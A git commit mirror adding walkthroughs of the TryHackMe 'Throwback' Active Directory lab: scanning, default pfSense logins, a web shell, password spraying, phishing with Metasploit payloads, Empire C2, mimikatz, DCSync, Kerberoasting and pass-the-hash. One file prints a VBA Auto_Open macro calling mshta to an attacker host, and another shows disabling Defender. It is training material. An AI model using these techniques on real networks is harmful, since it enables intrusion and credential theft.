Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity

Add files via upload

Browse source
This commit is contained in:
ARZ 2021-03-16 22:13:44 +05:00 committed by GitHub
parent 852a8dc1f8
commit 547c0e4481
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
11 changed files with 882 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
TryHackMe/Throwback/THROWBACK-CORP-ADT01.md Normal file
View file

@ -0,0 +1,20 @@
# TryHackMe-THROWBACK-CORP-ADT01 (10.200.34.243)
We found credentials for `DaviesJ` but we won't be able to login we need to run autoroute on CORP-DC01
<img src="https://imgur.com/aLsNxA8.png"/>
Open a meterpreter session on CORPORATE-ADT01
<img src="https://imgur.com/o8MO9dn.png"/>
<img src="https://imgur.com/VNSWfQr.png"/>
<img src="https://imgur.com/WoIhYan.png"/>
<img src="https://imgur.com/MiawTm7.png"/>
In `dosierk` 's documents we find a note
<img src="https://imgur.com/FEafmkL.png"/>

28
TryHackMe/Throwback/THROWBACK-CORP-DC01.md Normal file
View file

@ -0,0 +1,28 @@
# TryHackMe-THROWBACK-CORP-01(10.200.34.118)
We can login with MercerH's credentials as this domain is trusted by THROWBACK.LOCAL but in order to do we need to run `autoroute` on DC because we cannot reach CORP domain through PROD
<img src="https://imgur.com/AJ34khU.png"/>
Here I downloaded meterpreter backdoor
<img src="https://imgur.com/WLCmUCo.png"/>
<img src="https://imgur.com/B4mKgOR.png"/>
Now we have to remove route from previous sessions which in my case is `6` so I will use autoroute and `SET CMD delelte, SET SESSION 6` and then run it. After that I will `SET CMD autoadd , SET SESSION 7` and run the module
<img src="https://imgur.com/PDcxGdc.png"/>
<img src="https://imgur.com/eM5RNf4.png"/>
<img src="https://imgur.com/iw48rok.png"/>
<img src="https://imgur.com/TXd0vHL.png"/>
<img src="https://imgur.com/I0xYoQo.png"/>
Add both the domain names in /etc/hosts file
<img src="https://imgur.com/kmfuRu9.png"/>

16
TryHackMe/Throwback/THROWBACK-CORP-MAIL.md Normal file
View file

@ -0,0 +1,16 @@
# TryHackMe-THROWBACK-CORP-MAIL
On searching Throwback Hacks github I found a link to there repository
<img src="https://imgur.com/vbXloJn.png"/>
<img src="https://imgur.com/EUUORjf.png"/>
<img src="https://imgur.com/wq2KxP1.png"/>
Seeing the commit history of the file `db_connect.php` we can find credentials
<img src="https://imgur.com/eqwZnWX.png"/>
<img src="https://imgur.com/ThW75nI.png"/>

64
TryHackMe/Throwback/THROWBACK-DC01.md Normal file
View file

@ -0,0 +1,64 @@
# TryHackMe-THROWBACK-DC01(10.200.34.117)
I used SSH to log on the domain controller
<img src="https://imgur.com/eEnWAsQ.png"/>
We can see that we are a normal domain user on this machine so we need to escalate our privileges and the only way to enumerate AD is to use bloodhound so by using the same loot we got from WS-01 we are going to utilize it
Using the query `Find Principals with DCSync Rights`
<img src="https://imgur.com/Q2RPxq3.png"/>
Going into to the documents of jeffersd we find a notice
<img src="https://imgur.com/LYbWm2r.png"/>
Here there's a backup account password and we already found that `backup` has DCsync rights
```
DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller(DC) in order to retrieve password data via domain replication
```
By running secretsdump.py we dumped hashes from NTDS.dit
<img src="https://imgur.com/sbSK2qG.png"/>
Now we have a bunch of user hashes but the problem how we can we know which user to target as we need to escalate our privileges so running a command `net localgroup` to see available groups on AD
<img src="https://imgur.com/EUBLwuO.png"/>
We can see there's a group `Administrators`
<img src="https://imgur.com/G7NbGYD.png"/>
So we need to crack `MercerH` 's hash
<img src="https://imgur.com/LKSymjy.png"/>
To crack the hash we will be using a rules in `hashcat`
<img src="https://imgur.com/dtuvAZL.png"/>
<img src="https://imgur.com/XN9fu0a.png"/>
Simply ssh with the current logged in user
`ssh MercerH@localhost`
<img src="https://imgur.com/ykyHgFH.png"/>
And you can see we are now a privleged user
```
THROWBACK.local\MercerH:pikapikachu7
JeffersD:Throwback2020
```
Going back to bloodhound we can see that THROWBACK.LOCAL domain is trusted by CORPORATE.LOCAL
<img src="https://imgur.com/SlMTFHY.png"/>

102
TryHackMe/Throwback/THROWBACK-FW01.md Normal file
View file

@ -0,0 +1,102 @@
# TryHackMe-THROWBACK-FW01(10.200.34.138)
## NMAP
```
Nmap scan report for 10.200.34.138
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2021-02-20 14:40:52 PKT for 219s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
| 4096 38:04:a0:a1:d0:e6:ab:d9:7d:c0:da:f3:66:bf:77:15 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDN6yAJkDf3ePS4Etb1KKfEe6Az22BPADTvyCijKGexA0/xVVqwbhlLdXRf8lsGIyxOrEA/VZx7yq+iYL+tW8fnItuLaco6YTDJbtK8V0FQCFTyfCINNKH/jYABwG1i6TkZnaneAXKby8snChez7+r1Bz1fPzxne4PTrvBazH58jHV5A3y+xgskcZct8LnGnaib4LoAtXgd+t1sVjv+BHbpevCbSHNxhqb4S/Vsja2XTr37U1SXnst6xRTqRHal1ziq08Ijzxm17I5bUY6wRZRv01IZCWdE9JHaoVbkHtMOPMAsOsg99fXnb8I++jruuFWJbNQ26/1rwMqeaIslpAsKsFijCe5IbXwvKuzI6A9sM0IYObV+CevgYraQ7G4zx+WeBUIqu8dOt16n4suz33kaI17jbBdfSR6GxdT3ysqEsSkLd6p0HIR0JxIk5t7qGhG9KSvfsk42JUMyoocbK3tO8O/xInXPSuBWiohcGz0aJckVIOJuQSm8dkGRj62yOfzSyh9utWWu8Zi/dngRR6qOCMz538aQ/DReNEgqXl0Zn2roj42scFhidj4VgO0vhClotAmOZrFhu3wXc91ImkTdvApK7XcAQ4NGIt8kf0TylvHkV8T39zOB2uoFgITShRqHUQ6AnxwivFkdbdALT2IWh3CJRVD4Vwwog5L4ohsDjw==
53/tcp open domain syn-ack ttl 63 (generic dns response: REFUSED)
80/tcp open http syn-ack ttl 63 nginx
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.200.34.138/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http syn-ack ttl 63 nginx
|_http-favicon: Unknown favicon MD5: 5567E9CE23E5549E0FCD7195F3882816
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: pfSense - Login
| ssl-cert: Subject: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
| Subject Alternative Name: DNS:pfSense-5f099cf870c18
| Issuer: commonName=pfSense-5f099cf870c18/organizationName=pfSense webConfigurator Self-Signed Certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-11T11:05:28
| Not valid after: 2021-08-13T11:05:28
| MD5: fe06 fa47 4d83 8454 e67a 1840 7ea8 d101
| SHA-1: 672e 5f8f 9b28 7cad 5789 c5be cb1c f3f2 6c63 dfb2
|_-----END CERTIFICATE-----
```
### PORT 80 (HTTP)
<img src="https://imgur.com/gno4rk7.png"/>
We can see that there is a login page to pfsense control panel. I decided to try default credentials
<img src="https://imgur.com/YxPN6ai.png"/>
These credentials logged us in
<img src="https://imgur.com/9WiYRiq.png"/>
When logged in we can see `Diagnostics` tab and we see menu `Command Prompt`
<img src="https://imgur.com/sO9kOgD.png"/>
<img src="https://imgur.com/Ps3XdNV.png"/>
<img src="https://imgur.com/ECdK1pb.png"/>
We can see that commands will be executed as `root`
<img src="https://imgur.com/EpGlSAk.png"/>
Also php commands can be executed. I uploaded a `phpbash` which is like a backdoor having a full interactivev shell
`https://github.com/Arrexel/phpbash`
<img src="https://imgur.com/ge8QtTL.png"/>
<img src="https://imgur.com/wAdk1mU.png"/>
We can get the root flag in `/root/root.txt`
<img src="https://imgur.com/ZB6J78n.png"/>
We can find logs for in `/usr/local/www`
<img src="https://imgur.com/T65SEK1.png"/>
And we can get this this username and hash
`HumphreyW:1c13639dba96c7b53d26f7d00956a364`
I search for the log flag by running recusrive find command in `/var/log`
<img src="https://imgur.com/aLfc5dk.png"/>
Now the hash that we got for the user `HumphreyW` we need to crack it but we need to know what type of hash it is so I went to `Name That Hash`
<img src="https://imgur.com/HHCPKGI.png"/>
It gave me a bunch of hash type for it so I checked for MD5 and MD4 that was a negative
I started `hashcat` for NTLM (1000)
<img src="https://imgur.com/vecXikO.png"/>
And it was cracked
<img src="https://imgur.com/lB3yanM.png"/>

103
TryHackMe/Throwback/THROWBACK-MAIL.md Normal file
View file

@ -0,0 +1,103 @@
# TryHackMe-THROWBACK-MAIL (10.200.34.232 )
## NMAP
```
Nmap scan report for 10.200.34.232
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3b:b1:4c:b7:3f:fc:3e:ec:83:0f:0e:db:bf:25:9a:01 (RSA)
| 256 76:62:f3:eb:94:08:bc:a8:34:53:44:4d:ec:ac:87:f1 (ECDSA)
|_ 256 0b:80:aa:78:66:34:43:09:db:99:98:e1:99:7e:a8:b0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Throwback Hacks - Login
|_Requested resource was src/login.php
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: Pre-login IDLE LOGINDISABLEDA0001 SASL-IR more capabilities have ID post-login listed OK IMAP4rev1 STARTTLS ENABLE LOGIN-REFERR
ALS LITERAL+
| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
| Not valid before: 2020-07-25T15:51:57
|_Not valid after: 2030-07-23T15:51:57
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: Pre-login IDLE SASL-IR more capabilities have ID post-login IMAP4rev1 OK AUTH=PLAINA0001 listed ENABLE LOGIN-REFERRALS LITERAL+
| ssl-cert: Subject: commonName=ip-10-40-119-232.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-40-119-232.eu-west-1.compute.internal
| Not valid before: 2020-07-25T15:51:57
|_Not valid after: 2030-07-23T15:51:57
|_ssl-date: TLS randomness does not represent time
```
### PORT 80 (HTTP)
<img src="https://imgur.com/d9e7tsk.png"/>
We can login with the guest credentials which are
`tbhguest:WelcomeTBH1!`
<img src="https://imgur.com/LOmrerX.png"/>
We can get our first flag form the inbox
<img src="https://imgur.com/CWVwFgT.png"/>
Going to `Addresses` tab we can see a list of usernames and emails
<img src="https://imgur.com/jRZY2gn.png"/>
Now intercept the login request in order to start bruteforce attack so we can use these parameters in `hyda`
<img src="https://imgur.com/OupyinM.png"/>
We have the usernames but don't have the passwords but it was told that some accounts might use weak credentials so I crafted some passwords
```
Summer2020
Management2020
Management2018
Password2020
ThrowbackHacks2020
Throwback202
Password123
Winter2020
Winter2018
Spring2020
Winter2019
Summer2018
Summer2019
```
<img src="https://imgur.com/kZWj0R8.png"/>
```
login: PeanutbutterM password: Summer2020
login: DaviesJ password: Management2018
login: GongoH password: Summer2020
login: MurphyF password: Summer2020
login: JeffersD password: Summer2020
```
We logged in as guest again because it had the email addresses of all users and we wanted to send to everyone
<img src="https://imgur.com/feDfq4O.png"/>
Generate a staged payload for catching reverse shell through metasploit
<img src="https://imgur.com/wIg0ddO.png"/>
<img src="https://imgur.com/9S6i6Ph.png"/>
Attatched the payload in email
<img src="https://imgur.com/yPr7R71.png"/>
After sending the email I wait for some time a got a metepreter session
<img src="https://imgur.com/jFJpTyr.png"/>
<img src="https://imgur.com/G1Y5yPg.png"/>

238
TryHackMe/Throwback/THROWBACK-PROD.md Normal file
View file

@ -0,0 +1,238 @@
# TryHackMe-THROWBACK-PROD(10.200.34.219)
## NMAP
```
Nmap scan report for 10.200.34.219
Host is up (0.19s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 85:b8:1f:80:46:3d:91:0f:8c:f2:f2:3f:5c:87:67:72 (RSA)
| 256 5c:0d:46:e9:42:d4:4d:a0:36:d6:19:e5:f3:ce:49:06 (ECDSA)
|_ 256 e2:2a:cb:39:85:0f:73:06:a9:23:9d:bf:be:f7:50:0c (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Throwback Hacks
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THROWBACK
| NetBIOS_Domain_Name: THROWBACK
| NetBIOS_Computer_Name: THROWBACK-PROD
| DNS_Domain_Name: THROWBACK.local
| DNS_Computer_Name: THROWBACK-PROD.THROWBACK.local
| DNS_Tree_Name: THROWBACK.local
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-22T17:08:55+00:00
| ssl-cert: Subject: commonName=THROWBACK-PROD.THROWBACK.local
| Not valid before: 2021-02-21T16:52:43
|_Not valid after: 2021-08-23T16:52:43
|_ssl-date: 2021-02-22T17:09:35+00:00; +13s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 12s, deviation: 0s, median: 12s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-22T17:08:58
|_ start_date: N/A
```
### PORT 80 (HTTP)
<img src="https://imgur.com/JBjLauV.png"/>
Since this host has AD running so we can run a tool called `responder` to start an attack called LLMNR/NBT-NS poisoning
<img src="https://imgur.com/OpMmDhq.png"/>
<img src="https://imgur.com/kweooie.png"/>
I ran this tool for 2 days and it didn't gave me the hash , there was a problem in Throwbacks network so I had to continue looking up the writeups
### Remmina
Since this windows machine has port 3389 open which is for `Remote Desktop Protocol` we can login with PetersJ's passoword which is `Throwback317`
<img src="https://imgur.com/KeBEkmk.png"/>
### Installing Starkiller
Starkiller is C2 (Command and Control) frontend interface for "Empire" used for post exploitation without interfereing with the actual machine it self. It is used for enumeration and for identifiying privilege escalation vectors so for that we need to have `starkiller` and `empire`
<img src="https://imgur.com/22d5PmO.png"/>
<img src="https://imgur.com/RJoPGls.png"/>
Now we have to `chmod +x starkiller-1.3.2.AppImage` and `./starkiller-1.3.2.AppImage --no-sandbox`
<img src="https://imgur.com/iBx880x.png"/>
We will be presented with a login prompt
<img src="https://imgur.com/b6nbxVz.png"/>
### Installing Empire
Empire is great tool similar to meatsploit for post exploitation and information gathering used on windows machines
Run `git clone https://github.com/BC-SECURITY/Empire.git`
<img src="https://imgur.com/AeIlyAT.png"/>
Run `install.sh`
<img src="https://imgur.com/S5YIcIj.png"/>
This installation would take a long time. So going back to starkiller we log in with the credentials `empireadmin:passowrd123` and we need to make this application listen on defualt port which is `1337` leet but in order login we want empire to be running
<img src="https://imgur.com/yQgRlJ8.png"/>
<img src="https://imgur.com/LH0xXgZ.png"/>
So our installation for empire is complete but still we need to install some dependencies
`pip3 install poetry` and `poetry install` then `poetry run python empire`
<img src="https://imgur.com/T0CKmLl.png"/>
One last thing to do `pip3 install click` and when you run `powershell-empire`
<img src="https://imgur.com/oI7bFsl.png"/>
And it works but we need to use it with `--rest`,so
<img src="https://imgur.com/uznPAGc.png"/>
By using this option it will use the default ports and will allow us to use frontend which starkiller
<img src="https://imgur.com/jSKqMUA.png"/>
<img src="https://imgur.com/s08duZJ.png"/>
On logging in with the default credentials above
<img src="https://imgur.com/XcK3Ffr.png"/>
Now we are going to create our listener
<img src="https://imgur.com/C9c6HbQ.png"/>
We have our listener created
<img src="https://imgur.com/nLlDDRu.png"/>
Now we need to create our stager which is the payload we are going to transfer on the target machine
<img src="https://imgur.com/jQ2n0qf.png"/>
<img src="https://imgur.com/CWUgbh5.png"/>
<img src="https://imgur.com/SbqbSpy.png"/>
<img src="https://imgur.com/dpeTD8a.png"/>
Click on the download or save icon to save the payload somewhere on your local machine and then start a python3 http server to host it in order to download it from the target machine
<img src="https://imgur.com/Ydsqj2a.png"/>
The web server is running
<img src="https://imgur.com/kQToAFI.png"/>
We have that on the target machine all we need to do is launch the payload
On launching we will see some information regarding the target machine in the `agents` section
<img src="https://imgur.com/4XJE4QP.png"/>
We can see that starkiller is acting like C2 server which sends commands on the target machine and we can see the output over the GUI
<img src="https://imgur.com/i0l8yno.png"/>
Run `seatbelt` module
<img src="https://imgur.com/QBkCLbY.png"/>
<img src="https://imgur.com/jDwhgPE.png"/>
This module did enumeration for us a found a user with a saved credential
<img src="https://imgur.com/7xIrk2n.png"/>
<img src="https://imgur.com/L9ln4k5.png"/>
Now we have logged in as `admin-petersj` in order to dig deep we have to run mimikatz but for that we need to create another listener and stager in order to run c2 commands as elevated user
<img src="https://imgur.com/bLpUqC1.png"/>
<img src="https://imgur.com/zA88wGT.png"/>
<img src="https://imgur.com/cng57Ba.png"/>
On running this payload again
<img src="https://imgur.com/xvHivNX.png"/>
Now we need to run `mimikatz` module through our C2
<img src="https://imgur.com/lr1IlWS.png"/>
Running `privilege::debug` will give us a status `OK` means we can escalate our privileges to NT-AUTHORITY
<img src="https://imgur.com/QCrgIh9.png"/>
<img src="https://imgur.com/YyeUrWC.png"/>
We ran the command and notice if scroll down a little be we can see the password hashes of the users
<img src="https://imgur.com/KN0s9k0.png"/>
There's a feature in Starkiller which can save all the credentials or hashes found in a neat way
<img src="https://imgur.com/HLRA0Gq.png"/>
Now we have the credentials but don't know on which host these credentials are valid so we are going to something called` Pass The Hash` a realy attack for that we need to run `proxychains` or `autoroute` for that we need to have meterepreter session
<img src="https://imgur.com/s3zJGOS.png"/>
<img src="https://imgur.com/ZhlxTI1.png"/>
<img src="https://imgur.com/qnU0AuG.png"/>
<img src="https://imgur.com/gta3t5x.png"/>
<img src="https://imgur.com/2ZpOIBh.png"/>
Install `Crackmapexec`
https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation#binaries
<img src="https://imgur.com/NWSK4mb.png"/>
We can see that we can ping the ohter machines as well so the task says that the hash from task 10 will work which was from `HumprehyW` 's hash and the other from the list of credentials we dumped using mimikatz
<img src="https://imgur.com/cf5YlMY.png"/>
<img src="https://imgur.com/Iu9v0Vc.png"/>
PetersJ:Throwback317
runas /savecred /user:<user> /profile "cmd.exe"
use auxiliary/server/socks4a

41
TryHackMe/Throwback/THROWBACK-SEC-BREACH.md Normal file
View file

@ -0,0 +1,41 @@
# TryHackMe-THROWBACK-SEC-BREACH
Now we need to run this tool `LeetLinked`
<img src="https://imgur.com/mAolcZu.png"/>
This returned as a list of emails
<img src="https://imgur.com/0nO4zCc.png"/>
But we need to convert the format which found from a note in dosierk's documents. So we will be using `namely` to generate emails in a proper format using names we found from `leetlinked`
<img src="https://imgur.com/pQdjR2d.png"/>
<img src="https://imgur.com/juRsXJg.png"/>
Now this in HRE format but there are other formats as well
<img src="https://imgur.com/isgepKW.png"/>
<img src="https://imgur.com/xUI3yGl.png"/>
In this I generated a list of potential emails now only thing left for us to do is to visit `breachgtfo.local` and check for breached emails
<img src="https://imgur.com/xQzcFI9.png"/>
We can use `wfuzz` to check for response length
<img src="https://imgur.com/X7hwkzj.png"/>
We get the same amount of Characters so we can hide `4950` and see if there are characters with a length other than that
<img src="https://imgur.com/gGyaXgq.png"/>
And we have found a request with different characters
<img src="https://imgur.com/O1dwJ5z.png"/>
Now if we try to login on thier corporate mail
<img src="https://imgur.com/TYCSw0s.png"/>s

55
TryHackMe/Throwback/THROWBACK-TBSEC-DC01.md Normal file
View file

@ -0,0 +1,55 @@
# TryHackMe-THROWBACK-TBSEC-DC01
We have the credentials from the email
`TBSEC_GUEST:WelcomeTBSEC1!`
But in order to login I tried using `win-rm` and `ssh` both failed then I tried with RDP and got access
<img src="https://imgur.com/Ho5AHDs.png"/>
<img src="https://imgur.com/ampdw1G.png"/>
Run `powershell-empire --rest` and `starkiller`
<img src="https://imgur.com/wpzT0WF.png"/>
<img src="https://imgur.com/5lG3Rd1.png"/>
We have our listener ready
<img src="https://imgur.com/TqOQJnJ.png"/>
For setting a stager
<img src="https://imgur.com/aegimtS.png"/>
<img src="https://imgur.com/iTE4Rh6.png"/>
Now we need to deliver this bat file to target
<img src="https://imgur.com/fwnUaSg.png"/>
<img src="https://imgur.com/ITXp4LB.png"/>
<img src="https://imgur.com/Ofkg2vw.png"/>
Run the built in rubeus from starkiller
<img src="https://imgur.com/qQnZeMC.png"/>
<img src="https://imgur.com/5qlKOWh.png"/>
You can easily transfer the file by simpling clicking Download icon
<img src="https://imgur.com/Fgw8BZV.png"/>
<img src="https://imgur.com/nMxIDdx.png"/>
On running hashcat we will crack the hash
<img src="https://imgur.com/gQ8e57J.png"/>
We can now login through RDP with that account
<img src="https://imgur.com/dMtOKgt.png"/>

112
TryHackMe/Throwback/THROWBACK-TIME.md Normal file
View file

@ -0,0 +1,112 @@
# TryHackMe-THROWBACK-TIME(100.20.34.176)
Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine
<img src="https://imgur.com/Oua6jV6.png"/>
So we can access the web page
<img src="https://imgur.com/Ap23uHS.png"/>
Going back to MAIL machine to get reset link by logging in as `MurhphyF`
<img src="https://imgur.com/ct7QiLo.png"/>
<img src="https://imgur.com/C2GtwAZ.png"/>
murphyf
PASSWORD
Now we need to update our `/etc/hosts` file
<img src="https://imgur.com/PoMKmTj.png"/>
We updated the password through the reset link and can login with those
<img src="https://imgur.com/bqC9YLA.png"/>
Create a microsoft execl macro document having this macro in it using metasploit hta server
<img src="https://imgur.com/Dc9SkJn.png"/>
```
Sub HelloWorld()
PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
```
Where that .hta is generated through metasploit
<img src="https://imgur.com/hH3CtYv.png"/>
Upload that document
<img src="https://imgur.com/wMsI47W.png"/>
You will get a shell
<img src="https://imgur.com/rPVhUeX.png"/>
<img src="https://imgur.com/c50uP96.png"/>
By typing `sysinfo`
<img src="https://imgur.com/f8zyeGj.png"/>
We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command `ps` to check currently running processes
<img src="https://imgur.com/bdOCw2v.png"/>
Here we need to identify the process which is running as `NT AUTHORITY\SYSTEM` also running as a 64 bit
<img src="https://imgur.com/463bpoZ.png"/>
So we see this statisfying our requirements
<img src="https://imgur.com/4hK07Bz.png"/>
And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture
<img src="https://imgur.com/E32Xkih.png"/>
We can now run commands like mimikatz , hashdump
<img src="https://imgur.com/QbbtiWT.png"/>
We have successfully dumped the hashes of the accounts on this machine
<img src="https://imgur.com/VeUFkA8.png"/>
Using proxychains we ssh with `Timekeeper's` credentials
<img src="https://imgur.com/1nIqZ4k.png"/>
Switch to directory where mysql.exe is
<img src="https://imgur.com/U4SGngW.png"/>
Using the password from the kerberoasted mysql service account
<img src="https://i.imgur.com/rmE7npi.png"/>
<img src="https://imgur.com/4XA3GzU.png"/>
<img src="https://imgur.com/txG4w4O.png"/>
<img src="https://imgur.com/xzlIeYn.png"/>
<img src="https://imgur.com/bQ29SjC.png"/>
Save the list of usernames you found from `domain_users` database
<img src="https://imgur.com/h5Eomzj.png"/>
We can utilize the same list of passwords we used to get access to Throwbacks mail
<img src="https://imgur.com/oEVEw8H.png"/>
<img src="https://imgur.com/TctWVPF.png"/>

103
TryHackMe/Throwback/THROWBACK-WS01.md Normal file
View file

@ -0,0 +1,103 @@
# TryHackMe-THROWBACK-WS01 (10.200.34.222)
## NMAP
```
No ports open on this machine
```
We can get `user.txt` flag from here
<img src="https://imgur.com/xsRg9Ay.png"/>
And for `root.txt`
<img src="https://imgur.com/cUSPJ4C.png"/>
Since we have ran `autoroute` on `THROWBACK-WS01` we can access machines on the network as we were not able to run nmap scan on this machine
<img src="https://imgur.com/OGgwf4O.png"/>
<img src="https://imgur.com/yFaKuRh.png"/>
We can ssh into the machine with BlaireJ's plain text password
<img src="https://imgur.com/PJ4HyKK.png"/>
Now that we have gained inital foothold on WS-01 again we need to do some enumeration with `Bloodhound`.
After installing it on kali machine we can the GUI interface on browser
<img src="https://imgur.com/Ybb3IsB.png"/>
<img src="https://imgur.com/RgkCUOG.png"/>
Now we need to download a file called `Sharphound.ps1` a powershell script to be transfered on WS-01 machine
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
To run the script we need to disable antivirus or windows defender on the target machine
https://www.itechtics.com/enable-disable-windows-defender/
`Set-MpPreference -DisableRealtimeMonitoring $true`
<img src="https://imgur.com/AlJDpuw.png"/>
Then run this command to get a map of the AD environment
`Invoke-Bloodhound -CollectionMethod All -Domain THROWBACK.local -ZipFileName loot.zip`
<img src="https://imgur.com/NfjVTcj.png"/>
<img src="https://imgur.com/cGKVQsb.png"/>
Now we need to get this `20210227114234_loot.zip` on our machine
I messed up with the credentials and didn't found a way to reset so I disabled the authentication
`subl /etc/neo4j/neo4j.conf`
<img src="https://imgur.com/PuD7Ala.png"/>
<img src="https://imgur.com/35t7laC.png"/>
Copy that zip file from the target to our local machine
<img src="https://imgur.com/HZvlGCp.png"/>
Simply drag and drop to bloodhound GUI and run quries example get all admins
<img src="https://imgur.com/C9Sr8Mc.png"/>
Run the query `Map Domain Trusts`
<img src="https://imgur.com/aHAiDSP.png"/>
Run the query `List all Kerberoastable Accounts`
<img src="https://imgur.com/awmL00s.png"/>
Run the query `Find Shortest Paths to Domain Admins`
<img src="https://imgur.com/Y5sHUPg.png"/>
Now in order to get kerbroast ticket we need the impacket version 0.9.19
https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19
Reason is if we run with latest version
<img src="https://imgur.com/RCdKOTU.png"/>
We won't get the kerbroast ticket of SQLSERVICE account so on running with older version
<img src="https://imgur.com/gJvzinj.png"/>
On getting that kerbroast hash we need to crack it using `hashcat`
<img src="https://imgur.com/XbWpDwj.png"/>
<img src="https://imgur.com/rmE7npi.png"/>